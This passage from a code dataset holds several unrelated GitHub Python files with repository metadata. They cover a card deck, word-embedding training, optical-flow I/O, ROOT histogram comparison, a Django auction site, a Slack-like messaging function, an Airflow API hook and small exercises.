naipe(\"Oro\", 12, \"ororey\", 8, 10)\ncopa_rey = naipe(\"Copa\", 12, \"coparey\", 8, 10)\nespada_caballo = naipe(\"Espada\", 11, \"espadacaballo\", 9, 9)\nbasto_caballo = naipe(\"Basto\", 11, \"bastocaballo\", 9, 9)\noro_caballo = naipe(\"Oro\", 11, \"orocaballo\", 9, 9)\ncopa_caballo = naipe(\"Copa\", 11, \"copacaballo\", 9, 9)\nespada_sota = naipe(\"Espada\", 10, \"espadasota\", 10, 8)\nbasto_sota = naipe(\"Basto\", 10, \"bastosota\", 10, 8)\noro_sota = naipe(\"Oro\", 10, \"orosota\", 10, 8)\ncopa_sota = naipe(\"Copa\", 10, \"copasota\", 10, 8)\nbasto_7 = naipe(\"Basto\", 7, \"basto7\", 11, 7)\ncopa_7 = naipe(\"Copa\", 7, \"copa7\", 11, 7)\nespada_6 = naipe(\"Espada\", 6, \"espada6\", 12, 6)\nbasto_6 = naipe(\"Basto\", 6, \"basto6\", 12, 6)\noro_6 = naipe(\"Oro\", 6, \"oro6\", 12, 6)\ncopa_6 = naipe(\"Copa\", 6, \"copa6\", 12, 6)\nespada_5 = naipe(\"Espada\", 5, \"espada5\", 13, 5)\nbasto_5 = naipe(\"Basto\", 5, \"basto5\", 13, 5)\noro_5 = naipe(\"Oro\", 5, \"oro5\", 13, 5)\ncopa_5 = naipe(\"Copa\", 5, \"copa5\", 13, 5)\nespada_4 = naipe(\"Espada\", 4, \"espada4\", 14, 4)\nbasto_4 = naipe(\"Basto\", 4, \"basto4\", 14, 4)\noro_4 = naipe(\"Oro\", 4, \"oro4\", 14, 4)\ncopa_4 = naipe(\"Copa\", 4, \"copa4\", 14, 4)\n\nbaraja = [espada_1, espada_2, espada_3, espada_4, espada_5, espada_6, espada_7, espada_sota, espada_caballo, espada_rey,\n\t\t\toro_1, oro_2, oro_3, oro_4, oro_5, oro_6, oro_7, oro_sota, oro_caballo, oro_rey,\n\t\t\tbasto_1, basto_2, basto_3, basto_4, basto_5, basto_6, basto_7, basto_sota, basto_caballo, basto_rey,\n\t\t\tcopa_1, copa_2, copa_3, copa_4, copa_5, copa_6, copa_7, copa_sota, copa_caballo, copa_rey]\nusadas = []","repo_name":"franagustin/bori-ghost","sub_path":"comandos/cartas_objetos.py","file_name":"cartas_objetos.py","file_ext":"py","file_size_in_byte":2433,"program_lang":"python","lang":"hr","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"32468003192","text":"def observed():\n observations = []\n for i in range(7):\n observation = input(f\"Enter observation {i+1}: \")\n observations.append(observation)\n return observations\n\ndef run():\n print(\"Counting observations...\")\n observations_list = observed()\n observations_set = set((obs, observations_list.count(obs)) for obs in set(observations_list))\n print(observations_set)\nrun()","repo_name":"LucaBaldassano/QHO426","sub_path":"data/sets/set_from_list.py","file_name":"set_from_list.py","file_ext":"py","file_size_in_byte":400,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"27448277574","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# # Importation des données\n\n# In[1]:\n\n\nimport os\nimport string\nimport re\nimport math\nimport statistics\nfrom math import sqrt\nimport numpy as np\nimport random\nimport time\nimport pandas as pd\nimport nltk, re, pprint\n#nltk.download('punkt')\nfrom nltk import word_tokenize\nrandom.seed(1)\nnp.random.seed(1)\nimport matplotlib.pyplot as plt\nfrom IPython.display import clear_output\nfrom matplotlib import pyplot as plt\nimport collections\nget_ipython().run_line_magic('matplotlib', 'inline')\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nimport torch.autograd as autograd\n\nimport pickle\n\n#os.chdir('C:/Users/torna/Documents/StatApp/StatApp')\nos.chdir('/Users/alainquartierlatente/Desktop/Ensae/StatApp')\n#os.chdir('/home/aqlt/Documents/Ensae/StatApp')\n#os.chdir('C:/Users/Kim Antunez/Documents/Projets_autres/StatApp')\nnom_dossier = \"100k\"\n#nom_dossier = \"ens\" #ou\n\n\n# On ne garde ici que les 100 000 premiers tweets\n\n# In[2]:\n\n\n# Penser à changer selon taille\nwith open(\"data/%s/vocabulary.file\" %nom_dossier, \"rb\") as f:\n taille_vocab = len(pickle.load(f))\n\n\n# In[3]:\n\n\n# Fonction pour mettre à jour le graphique en direct\ndef live_plot(data, figsize=(7,5), title=''):\n clear_output(wait=True)\n plt.figure(figsize=figsize)\n plt.plot(data)\n plt.title(title)\n plt.grid(True)\n plt.xlabel('epoch')\n plt.show();\n\n\n# # Lancement du modèle\n# Paramètres fixés : la dimension, le nombre de mots tirés dans le *negative sampling* et la proba utilisé, l'affichage du graphique\n\n# In[9]:\n\n\nif nom_dossier == \"ens\":\n dim = 50\nelse:\n dim = 20\nplot = True\nepoch = 10\n\n\n# Paramètres à modifier :\n\n# In[13]:\n\n\nlearning_rate = 0.02\nwindow = 4\nnumero_simulation = 13\n\n\n# In[ ]:\n\n\nseed = 1\n# On crée le dossier Simulation_{numero_simulation}\nif not os.path.exists(\"data/%s/Simulation_%i_seed%i\" %(nom_dossier, numero_simulation, seed)):\n os.mkdir(\"data/%s/Simulation_%i_seed%i\" %(nom_dossier, numero_simulation, seed))\nelse:\n print(\"Attention : le dossier Simulation_%i_seed%i existe déjà\" %(numero_simulation, seed))\n\ntorch.manual_seed(seed)\ninput = torch.randn(taille_vocab, dim)\noutput = torch.randn(taille_vocab, dim)\ninput = autograd.Variable(input, requires_grad=True)\noutput = autograd.Variable(output, requires_grad=True)\n\nloss_tot = []\ntemps_par_epoch = []\n\nstart = time.time()\nfor i in range(epoch):\n loss_val = 0\n start_epoch = time.time()\n \n print(\"Simulation %i - Lecture du fichier data/%s/window_%i/epoch_%i.file\" %(numero_simulation,nom_dossier, window, i))\n with open(\"data/%s/window_%i/epoch_%i.file\" % (nom_dossier, window, i), \"rb\") as f:\n test_sample = pickle.load(f)\n\n for focus, context, neg_sample in test_sample:\n data = torch.matmul(input[focus,], torch.t(output[context,]))\n loss1 = - F.logsigmoid(data)\n\n data = torch.matmul(input[focus,], torch.t(output[neg_sample,]))\n loss2 = - F.logsigmoid(-data).sum()\n loss_val += loss1 + loss2\n # Pour ensuite dériver les matrices par rapport à la loss\n (loss1+loss2).backward()\n\n # Il faut modifier juste le .data pour ne pas perdre la structure\n input.data = input.data - learning_rate * input.grad.data\n output.data = output.data - learning_rate * output.grad.data\n\n input.grad.data.zero_()\n output.grad.data.zero_()\n \n with open(\"data/%s/Simulation_%i_seed%i/input_%i.file\" %(nom_dossier, numero_simulation, seed, (len(loss_tot)+1)), \"wb\") as f:\n pickle.dump(input, f, pickle.HIGHEST_PROTOCOL)\n with open(\"data/%s/Simulation_%i_seed%i/output_%i.file\" %(nom_dossier, numero_simulation, seed, (len(loss_tot)+1)), \"wb\") as f:\n pickle.dump(output, f, pickle.HIGHEST_PROTOCOL)\n with open(\"data/%s/Simulation_%i_seed%i/loss.file\" %(nom_dossier, numero_simulation, seed), \"wb\") as f:\n pickle.dump(loss_tot, f, pickle.HIGHEST_PROTOCOL)\n with open(\"data/%s/Simulation_%i_seed%i/temps_par_epoch.file\" %(nom_dossier, numero_simulation, seed), \"wb\") as f:\n pickle.dump(temps_par_epoch, f, pickle.HIGHEST_PROTOCOL)\n \n end_epoch = time.time()\n temps_par_epoch.append(end_epoch - start_epoch)\n loss_val = loss_val / taille_vocab\n loss_tot.append(loss_val)\n if plot:\n live_plot(loss_tot)\n print(round((end_epoch - start_epoch)/60, 2))\nend = time.time()\nprint(round((end - start)/60, 2))\nprint(statistics.mean(temps_par_epoch)/60)\n\n\n# In[27]:\n\n\nnb_tweets = 100000\nwith open('data/%ik/Simulation_%ibis2/input' % int(nb_tweets/1000) + \n \"\" %numero_simulation +\n \"_1.file\", \"rb\") as f:\n input2 = pickle.load(f)\nwith open('data/%ik/' % int(nb_tweets/1000) +\n \"Simulation_%ibis2/output\" %numero_simulation + \n \"_1.file\", \"rb\") as f:\n output2 = pickle.load(f)\nwith open('data/%ik/' % int(nb_tweets/1000) + \n \"Simulation_%i/input\" %numero_simulation +\n \"_1.file\", \"rb\") as f:\n input = pickle.load(f)\nwith open('data/%ik/' % int(nb_tweets/1000) +\n \"Simulation_%i/output\" %numero_simulation + \n \"_1.file\", \"rb\") as f:\n output = pickle.load(f)\nprint(torch.all(torch.eq(input, input2)))\n\n\n# In[12]:\n\n\ntorch.manual_seed(1)\ninput = torch.randn(taille_vocab, dim)\ntorch.manual_seed(1)\ninput2 = torch.randn(taille_vocab, dim)\nprint(torch.all(torch.eq(input, input2)))\n\n\n# In[10]:\n\n\ndim\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"ARKEnsae/TweetEmbedding","sub_path":"Code/Format py/2A - Lancement_modele_100k.py","file_name":"2A - Lancement_modele_100k.py","file_ext":"py","file_size_in_byte":5428,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"68"} +{"seq_id":"15024421050","text":"import numpy as np\n\n\ndef load_flow(path):\n with open(path, 'rb') as f:\n magic = float(np.fromfile(f, np.float32, count = 1)[0])\n if magic == 202021.25:\n w, h = np.fromfile(f, np.int32, count = 1)[0], np.fromfile(f, np.int32, count = 1)[0]\n data = np.fromfile(f, np.float32, count = h*w*2)\n data.resize((h, w, 2))\n return data\n return None\n\n\ndef save_flow(path, flow):\n magic = np.array([202021.25], np.float32)\n h, w = flow.shape[:2]\n h, w = np.array([h], np.int32), np.array([w], np.int32)\n\n with open(path, 'wb') as f:\n magic.tofile(f)\n w.tofile(f)\n h.tofile(f)\n flow.tofile(f)\n","repo_name":"ckxy/castty","sub_path":"castty/utils/flow_tools.py","file_name":"flow_tools.py","file_ext":"py","file_size_in_byte":688,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"68"} +{"seq_id":"26649256176","text":"#defining rules\ndef get_rules():\n rules = {\"Numbers\":{\n \"zero\": 0,\n \"one\" : 1,\n \"two\": 2,\n \"three\": 3,\n \"four\": 4,\n \"five\": 5,\n \"six\": 6,\n \"seven\": 7,\n \"eight\": 8,\n \"nine\": 9,\n \"ten\": 10,\n \"twenty\": 20,\n \"thirty\": 30,\n \"forty\": 40,\n \"fifty\": 50,\n \"sixty\": 60,\n \"seventy\": 70,\n \"eighty\": 80,\n \"ninety\": 90,\n \"hundred\": 100\n },\n \"Tuples\": {\n \"single\":1,\n \"double\":2,\n \"triple\":3,\n \"quadruple\":4,\n \"quintuple\":5,\n \"sextuple\":6,\n \"septuple\":7,\n \"octuple\":8,\n \"nonuple\":9,\n \"decuple\":10\n },\n \"General\": {\n \"C M\": \"CM\",\n \"P M\": \"PM\",\n \"D M\": \"DM\",\n \"A M\": \"AM\"\n }\n }\n return rules\n\n#checking if word has comma at front or at last or at both if true then return front,word and last \ndef check_front_last(word):\n front=\"\"\n last=\"\"\n if(len(word)>1):\n if word[-1]==',' or word[-1]=='.':\n last=word[-1]\n word=word[:-1]\n if word[0]==',' or word[0]=='.':\n front=word[0]\n word=word[1:]\n return front,word,last\n\n\n#class for conversion\nclass SpokenToWritten:\n\n def __init__(self):\n\n self.rules=get_rules()\n self.paragraph=\"\"\n self.ouptut_para=\"\"\n\n #getting user input\n def get_user_input(self):\n\n self.paragraph=input(\"\\n[IN]:Enter Your paragraph of spoken english:\\n\\t\")\n\n if not self.paragraph:\n raise ValueError(\"[Error]: You entered nothing.\")\n\n #getting user output\n def show_output(self):\n print(\"\\n[OUT]:The input Spoken English Paragraph: \\n\\n \\\" \"+ self.paragraph+\"\\\"\")\n print(\"\\nConverted Written English Paragraph: \\n\\n \\\"\" +self.ouptut_para+\"\\\"\")\n\n \n #main conversion function of spoken to written english \n def Convert(self):\n #splitting paragraph into individual words\n words_of_para=self.paragraph.split()\n\n #accessing defines rules\n numbers=self.rules['Numbers']\n tuples=self.rules['Tuples']\n general=self.rules['General']\n i=0\n no_of_words=len(words_of_para)\n #loop will run for the number of words in paragraph \n while i 5 and any(folder in split_path for folder in (folder_list)): \n elif len(split_path) > 5 and any(folder in split_path for folder in (folder_list)): \n \n\t\t# We are greater than 3 directories deep and these directories include the specified folders above, goo deeper\n f_path,chi2_dict,n_th1,n_th2,n_tp,errors = validate_uw_hists(input,file1, file2,f_path,chi2_dict,n_th1,n_th2,n_tp,errors) \n\n \n # If the length is shorter than the specified number, than we need to continue the loop\n else:\n pass\n \n # Record the file_path that will result now that we are done with the current folder level\n # i.e. the folder path that results from going up a level in the directory\n f_path = f_path.split('/')\n f_path = '/'.join(f_path[:-1])\n \n elif issubclass(type(input), ROOT.TProfile):\n # The is a TProfile \n\n # Increment the number of TProfiles variable n_tp\n n_tp += 1 \n \n # Record the path of the directory we are looking in with the name of the hist file as part of the path\n try:\n f_path_tp = f_path + '/' + input.GetName() \n except:\n print(\"can't get f_path_tp\")\n \n # Format f_path_tp\n try:\n # Get the part of f_path that follows the ':'\n f_path_tp = f_path_tp.split(':')\n f_path_tp = f_path_tp[1][1:]\n except:\n print(\"can't format f_path_tp\")\n \n \n # Calculate the chi2 values and store them in chi2_dict\n try:\n # Calculate the chi2 value between file1's and file2's filename:f_name\n chi2ndf_val = file1.Get(f_path_tp).Chi2Test(file2.Get(f_path_tp),'CHI2/NDF')\n chi2_dict['f_name'].append(f_path_tp)\n chi2_dict['f_type'].append('TProfile')\n chi2_dict['chi2ndf_vals'].append(chi2ndf_val)\n print('chi2success')\n except: \n errors +=1\n print(f'chi2_tp error on filepath: {f_path_th2}')\n\n \n elif issubclass(type(input),ROOT.TH2):\t \n # The is a TH2 histogram\n\n # Increment the number of TH2s in variable n_th2\n n_th2 += 1 \n\n # Record the path of the directory we are looking in with the name of the hist file as part of the path\n try:\n f_path_th2 = f_path + '/' + input.GetName() \n except:\n print(\"can't get f_path_th2\")\n \n # Format f_path_th2 \n try:\n\t # Get the part of f_path that follows the ':'\n f_path_th2 = f_path_th2.split(':')\n f_path_th2 = f_path_th2[1][1:]\n except:\n print(\"can't format f_path_th2\")\n \n\t # Calculate the chi2 values and store them in chi2_dict\n try:\n # Calculate the chi2 value between file1's and file2's filename:f_name\n chi2ndf_val = file1.Get(f_path_th2).Chi2Test(file2.Get(f_path_th2),'CHI2/NDF')\n chi2_dict['f_name'].append(f_path_th2)\n chi2_dict['f_type'].append('TH2')\n chi2_dict['chi2ndf_vals'].append(chi2ndf_val)\n except: \n errors +=1\n print(f'chi2_th2 error on filepath: {f_path_th2}')\n \n \n elif issubclass(type(input),ROOT.TH1): \n # This is a TH1 histogram\n\n # Increment the number of TH2s in variable n_th1\n n_th1 += 1\n \n # Record the path of the directory we are looking in with the name of the hist file as part of the path\n try:\n f_path_th1 = f_path + '/' + input.GetName() \n except:\n print(\"cant GetPath2\")\n\n # Format f_path_th1\n try:\n # Get the part of f_path that follows the ':'\n f_path_th1 = f_path_th1.split(':')\n f_path_th1 = f_path_th1[1][1:]\n except:\n print(\"can't format f_path_th1\")\n\n # Calculate the chi2 values and store them in chi2_dict \n try:\n # Calculate the chi2 value between file1's and file2's filename:f_name\n chi2ndf_val = file1.Get(f_path_th1).Chi2Test(file2.Get(f_path_th1),'CHI2/NDF')\n chi2_dict['f_name'].append(f_path_th1)\n chi2_dict['f_type'].append('TH1')\n chi2_dict['chi2ndf_vals'].append(chi2ndf_val)\n except: \n errors +=1\n print(f'chi2 error on filepath: {f_path_th1}')\n \n\n return f_path, chi2_dict, n_th1, n_th2,n_tp, errors\n\n#####################\n# The Main Function #\n#####################\n\ndef chi2df():\n\n try:\n with open('/app/data/fileOne.txt', 'r') as f:\n for line in f.readlines():\n if '' not in line or ' ' not in line or '\\n' not in line:\n file1 = ROOT.TFile.Open(\"/app/data/\" + line)\n # file1 = ROOT.TFile.Open(line)\n except:\n print('file1 sucks')\n file1 = ROOT.TFile('/app/data/fileOneError.root','RECREATE')\n\n print('FILE1:',file1)\n\n try:\n with open('/app/data/fileTwo.txt', 'r') as f:\n for line in f.readlines():\n if '' not in line or ' ' not in line or '\\n' not in line:\n file2 = ROOT.TFile.Open(\"/app/data/\" + line)\n # file2 = ROOT.TFile.Open(line)\n except:\n print('file2 sucks')\n file2 = ROOT.TFile.Open('/app/data/fileTwoError.root','RECREATE')\n \n print('FILE2:',file2)\n\n # To silence the chi2 errors, use the following\n # ROOT.gSystem.RedirectOutput(\"/dev/null\")\n\n # Calculate the chi2 values and other relevant information for the comparison\n f_path, chi2_dict,n_th1,n_th2,n_tp,errors = validate_uw_hists(file1, file1,file2,'',{'f_name':[],'f_type':[],'chi2ndf_vals':[]},0,0,0,0)\n\n # Construct the dataframe\n df = pd.DataFrame(chi2_dict)\n \n print('processing complete..')\n\n return df, errors\n","repo_name":"CaryRandazzo/ATLAScollab","sub_path":"AtlasValidationDashboard/dashboard/src/chi2.py","file_name":"chi2.py","file_ext":"py","file_size_in_byte":8413,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"36462381499","text":"def lambda_handler(event, context):\n input = event['queryStringParameters']['input']\n scammer = Scammer()\n scammer_response = scammer.get_scam_message(input)\n \n return {\n 'statusCode': 200,\n 'body': scammer_response\n }\n\n\nclass Scammer:\n\n SCAM_TEMPLATE = \"Hello, you just won 1.000.000$ for being the 1000th person to write: {}. Claim your prize today!'\"\n\n def get_scam_message(self, input):\n return self.SCAM_TEMPLATE.format(input)","repo_name":"valeri0/lambda-rest-api","sub_path":"lambda/src/index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":476,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"19320980511","text":"from F14 import save\n\ndef ext():\n # SPESIFIKASI\n # Memberi pilihan menyimpan program sebelum program diakhiri\n\n # KAMUS\n # YorN : char\n\n # ALGORITMA\n while True: # While loop tidak akan berhenti hingga input user valid\n YorN = input('Apakah Anda mau melakukan penyimpanan file yang sudah diubah? (y/n) ')\n if YorN == 'Y' or YorN == 'y':\n # Akan dilakukan penyimpanan data dengan menjalankan prosedut save\n save()\n break\n elif YorN == 'N' or YorN =='n':\n break\n else:\n print('Masukan tidak valid')","repo_name":"Hifzd/Final-Tubes-Daspro","sub_path":"New/F16.py","file_name":"F16.py","file_ext":"py","file_size_in_byte":597,"program_lang":"python","lang":"id","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"1295788288","text":"from django.contrib.auth import authenticate, login, logout\nfrom django.contrib.auth.decorators import login_required\nfrom django.db import IntegrityError\nfrom django.http import HttpResponse, HttpResponseRedirect\nfrom django.shortcuts import render, redirect\nfrom django.urls import reverse\n\nfrom urllib.parse import urlparse\nimport os.path\n\nfrom .models import *\nfrom .forms import *\n\ndef index(request):\n return render(request, \"auctions/index.html\",{\n 'listing_pages': Listing.objects.filter(active=True).order_by('-id')\n })\n\n\ndef login_view(request):\n if request.method == \"POST\":\n\n # Attempt to sign user in\n username = request.POST[\"username\"]\n password = request.POST[\"password\"]\n user = authenticate(request, username=username, password=password)\n\n # Check if authentication successful\n if user is not None:\n login(request, user)\n return HttpResponseRedirect(reverse(\"index\"))\n else:\n return render(request, \"auctions/login.html\", {\n \"message\": \"Invalid username and/or password.\"\n })\n else:\n return render(request, \"auctions/login.html\")\n\n\ndef logout_view(request):\n logout(request)\n return HttpResponseRedirect(reverse(\"index\"))\n\n\ndef register(request):\n if request.method == \"POST\":\n username = request.POST[\"username\"]\n email = request.POST[\"email\"]\n\n # Ensure password matches confirmation\n password = request.POST[\"password\"]\n confirmation = request.POST[\"confirmation\"]\n if password != confirmation:\n return render(request, \"auctions/register.html\", {\n \"message\": \"Passwords must match.\"\n })\n\n # Attempt to create new user\n try:\n user = User.objects.create_user(username, email, password)\n user.save()\n except IntegrityError:\n return render(request, \"auctions/register.html\", {\n \"message\": \"Username already taken.\"\n })\n login(request, user)\n return HttpResponseRedirect(reverse(\"index\"))\n else:\n return render(request, \"auctions/register.html\")\n\n@login_required\ndef create_listing(request):\n \n if request.method == 'POST':\n new_listing = ListingForm(request.POST, request.FILES)\n\n if new_listing.is_valid():\n j = new_listing.save(commit=False)\n j.user = request.user\n j.save()\n return render(request, \"auctions/index.html\",{\n 'listing_pages': Listing.objects.filter(active=True).order_by('-id')\n })\n \n else:\n return render(request, \"auctions/create_listing.html\", {\n \"form\": ListingForm()\n })\n\n@login_required\ndef view_listing(request, listing_id):\n \n page = {\n 'listing' : Listing.objects.get(id=listing_id),\n 'comments' : Comment.objects.all().filter(listing_id=listing_id),\n 'in_watchlist' : Watchlist.objects.all().filter(listing__id=listing_id, user__id=request.user.id),\n 'new_bid': BidForm(),\n 'new_comment' : CommentForm(),\n }\n \n if request.method == 'POST':\n if request.POST.get('form_type') == 'post_comment':\n new_comment = CommentForm(request.POST)\n\n if new_comment.is_valid():\n j = new_comment.save(commit=False)\n j.user = request.user\n j.listing = Listing.objects.get(id=listing_id)\n j.save()\n \n return render(request, 'auctions/view_listing.html', page)\n\n elif request.POST.get('form_type') == 'post_bid':\n new_bid = BidForm(request.POST)\n if new_bid.is_valid():\n old_bid = new_bid.cleaned_data.get('value')\n\n try:\n highest_bid = Listing.objects.get(id=listing_id).bids.last().value\n except: \n highest_bid = 0\n\n if highest_bid >= old_bid or old_bid <= Listing.objects.get(id=listing_id).price:\n page['new_bid'] = new_bid\n new_bid.add_error('value', 'bid is not high enough')\n \n return render(request, 'auctions/view_listing.html', page)\n\n mod_listing = Listing.objects.get(id=listing_id)\n add_bid = Bid(user=request.user, value=old_bid)\n add_bid.save()\n mod_listing.bids.add(add_bid)\n \n return render(request, 'auctions/view_listing.html', page)\n\n else:\n return render(request, 'auctions/view_listing.html', page)\n\n@login_required\ndef finish_listing(request, listing_id):\n\n if Listing.objects.get(id=listing_id).user != request.user:\n return render(request, 'auctions/index.html')\n else:\n listing_to_finish = Listing.objects.get(id=listing_id) \n listing_to_finish.active = False\n listing_to_finish.save()\n return redirect(request.META['HTTP_REFERER'])\n\n@login_required\ndef in_watchlist(request, listing_id):\n \n on_watch = Watchlist.objects.all().filter(\n listing__id = listing_id, \n user__id = request.user.id\n )\n\n if on_watch:\n on_watch.delete()\n else:\n new_watchlist = Watchlist(\n listing=Listing.objects.get(id=listing_id), \n user=request.user\n )\n new_watchlist.save() \n\n if os.path.split(urlparse(request.META['HTTP_REFERER']).path)[1] != 'watchlist':\n return redirect(request.META['HTTP_REFERER'])\n else:\n return render(request, 'auctions/my_watchlist.html')\n \n\n@login_required\ndef my_watchlist(request):\n\n return render(request, 'auctions/my_watchlist.html', {\n 'watchlist': Watchlist.objects.filter(user=request.user).order_by('-id')\n })\n\n@login_required\ndef my_listings(request):\n \n return render(request, 'auctions/my_listings.html', {\n 'my_listings': Listing.objects.filter(user=request.user).order_by('-id')\n })\n\n@login_required\ndef view_categories(request):\n\n return render(request, 'auctions/list_categories.html', {\n 'list_categories': Category.objects.all()\n })\n\n@login_required\ndef view_category(request, category_id):\n\n return render(request, 'auctions/view_category.html', {\n 'cat_listings': Listing.objects.filter(category=category_id).order_by('-id')\n })","repo_name":"robsonvpires/ecommerce","sub_path":"auctions/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6407,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"8543683882","text":"# function for 'channel_messages', allowing users to view up to last 50 messages in a channel\n\nfrom server.general import AccessError, ValueError, decode_token, valid_channel_id, num_channel_messages, id_to_channel, user_in_channel, is_reacted, id_to_message, authorise_token\n\n@authorise_token\ndef channel_messages(token, channel_id, start):\n # channel does not exit or start > total number of messages\n if not valid_channel_id(channel_id):\n raise ValueError(description=\"Channel does not exist \")\n # user is not part of the channel\n elif not user_in_channel(decode_token(token), channel_id):\n raise AccessError(description=\"User is not a member of the channel\")\n \n u_id = decode_token(token)\n channel = id_to_channel(channel_id)\n\n # start is greater than the number of messages in the channel \n if start > num_channel_messages(channel_id):\n raise ValueError(description=\"No more messages left in the channel\")\n\n channel_message = {\n 'messages': [], \n 'start': 0, \n 'end': 0 \n }\n\n # intialises the values of channel_messages \n channel_message['start'] = start\n count = 0 \n message_list = channel['messages'][::-1]\n\n # loops through the reverse chronological messages and adds them to the list \n for message in message_list: \n # message is removed so will ignore it \n if message['is_removed']:\n continue\n\n # ONLY VALID REACT_ID IS 1 (AS THE SPEC SAYS)\n if not is_reacted(u_id, message['message_id'], 1):\n message['reacts'][0]['is_this_user_reacted'] = False\n data_msg = id_to_message(message['message_id'])\n data_msg['reacts'][0]['is_this_user_reacted'] = False\n\n if count < start + 50 and count >= start and not message['is_removed']: \n channel_message['messages'].append(message) \n \n count = count + 1 \n\n # less than 50 messages have been returned \n if len(channel_message['messages']) != 50:\n channel_message['end'] = -1 \n else: \n channel_message['end'] = start + 50 \n\n return channel_message\n","repo_name":"kevywevyy/Slack","sub_path":"server/channel_messages.py","file_name":"channel_messages.py","file_ext":"py","file_size_in_byte":2118,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"4138203562","text":"import time as t\nimport matplotlib.pyplot as plt\n# mass, velocity, accln, disp, time\n# interaction force every loop\n# inputs --> thrust increments -> new_accl, and continous parameters\n# some step function --> steps through iterations\n\ntime = 0\n\nclass Spacecraft:\n\tdef __init__(self, name, mass, velocity, accln, x_pos):\n\t\tself.name = name\n\t\tself.mass = mass\n\t\tself.velocity = velocity\n\t\tself.accln = accln\n\t\tself.x_pos = x_pos\n\n\tdef step_Function(self):\n\t\tglobal time\n\t\t# MASS CONSTANT\n\t\ttime_step = 0.01 \n\t\ttime += time_step\n\t\tself.x_pos += self.velocity * time_step\n\t\tself.velocity += self.accln * time_step\n\t\tself.accln += time ** 2\n\n\t\t\t\t\t\t\n\tdef display_Status(self):\n\t\tglobal time\n\t\tprint(\"TIME -->\", time)\n\t\tprint(\"CRAFT -->\", self.name)\n\t\tprint(\"MASS --> \", self.mass)\n\t\tprint(\"VELOCITY --> \", self.velocity)\n\t\tprint(\"ACCLRTION--> \", self.accln)\n\t\tprint(\"POSITION --> \", self.x_pos)\n\t\tprint(\"\\n\")\t\n\nchaser = Spacecraft(\"CHASER\", 100, 10, 2, 0)\n\nx_list = []\nt_list = []\n\nfor i in range(0, 1000):\n\tchaser.display_Status()\n\tchaser.step_Function()\n\t\n\tx_list.append(chaser.x_pos)\n\tt_list.append(time)\n\nplt.plot(t_list, x_list)\nplt.show()","repo_name":"vimanyuveer/2D-Differential-Sim","sub_path":"Docking_Sim.py","file_name":"Docking_Sim.py","file_ext":"py","file_size_in_byte":1150,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"40217083555","text":"from airflow.hooks.http_hook import HttpHook\n\nimport requests\nimport json\n\nclass CfApiHook(HttpHook):\n\n def __init__(self, query, conn_id = None):\n self.query = query\n self.conn_id = conn_id or \"cf_api\"\n super().__init__(http_conn_id=self.conn_id)\n\n\n def create_url(self, **kwargs):\n query = self.query\n url = f\"{self.base_url}/{query}?\"\n for k, arg in kwargs.items():\n url += f\"{k}={arg}&\"\n return url[:-1]\n\n\n def connect_to_endpoint(self, url, session):\n response = requests.Request(\"GET\", url)\n prep = session.prepare_request(response)\n self.log.info(f\"URL: {url}\")\n return self.run_and_check(session, prep, {}).json()\n\n\n def run(self):\n session = self.get_conn()\n url = self.create_url()\n return self.connect_to_endpoint(url, session)\n\n\nif __name__ == \"__main__\":\n print(json.dumps(CfApiHook(\"contest.list?gym=true\").run(), indent=4,sort_keys=True))","repo_name":"RafaelGranza/CodeForces-ETL","sub_path":"airflow/plugins/hooks/cf_api_hook.py","file_name":"cf_api_hook.py","file_ext":"py","file_size_in_byte":977,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"72307869018","text":"import math\n\n\nclass TasksAllocator:\n\n def __init__(self, tasks, n_intervals, n_cloud_nodes):\n '''\n :param tasks: obiekty zadań\n :param n_intervals: ile przedziałów\n :param intervals: lista przedziałów (górne granice)\n :param shards\n :param shard_load_vect: słownik shard:wektor\n :param summed_vects: słownik shard:miara miejska dla wektora\n :param wts\n :param n_cloud_nodes: ile węzłów chmury\n :param norm_wts\n '''\n\n self.tasks = tasks\n self.n_intervals = n_intervals\n self.intervals = None\n self.shards = []\n self.shard_load_vect = None\n self.summed_vects = {}\n self.wts = []\n self.n_cloud_nodes = n_cloud_nodes\n self.norm_wts = None\n\n def find_shards_load_vectors(self):\n self.tasks.sort(key=lambda task: task.TS+task.length, reverse=False)\n #delta - szerokość naszych przedziałów, co ile kolejny przedział\n delta = math.ceil((self.tasks[-1].TS+self.tasks[-1].length) / self.n_intervals)\n self.intervals = [*range(delta, math.ceil(self.tasks[-1].TS+self.tasks[-1].length)+delta, delta)]\n #print(self.intervals)\n shards = set()\n for task in self.tasks:\n shards.add(task.shard)\n self.shards = sorted(list(shards))\n\n\n #słownik, klucz szard : wartość wektor obciążeń\n intervals = [[0 for _ in range(len(self.intervals))] for _ in range(len(self.shards))]\n\n for task in self.tasks:\n mapped_shard = self.shards.index(task.shard)\n first_interval = math.floor(task.TS/delta)\n last_interval = math.ceil((task.TS + task.length)/delta - 1)\n # jeżeli długość zadania mieści się w przedziale\n if first_interval == last_interval:\n intervals[mapped_shard][first_interval] += (task.length/delta)\n # jeżeli długość się nie mieści\n else:\n # część w pierwszym przedziale\n part_inside_first_interval = self.intervals[first_interval] - task.TS\n intervals[mapped_shard][first_interval] += part_inside_first_interval / delta\n # pełne przedziały\n for i in range(first_interval+1, last_interval, 1):\n # print(f\"pełny przedział w {task = }\")\n intervals[mapped_shard][i] = 1\n # część w ostatnim przedziale\n part_inside_last_interval = (task.TS+task.length) - 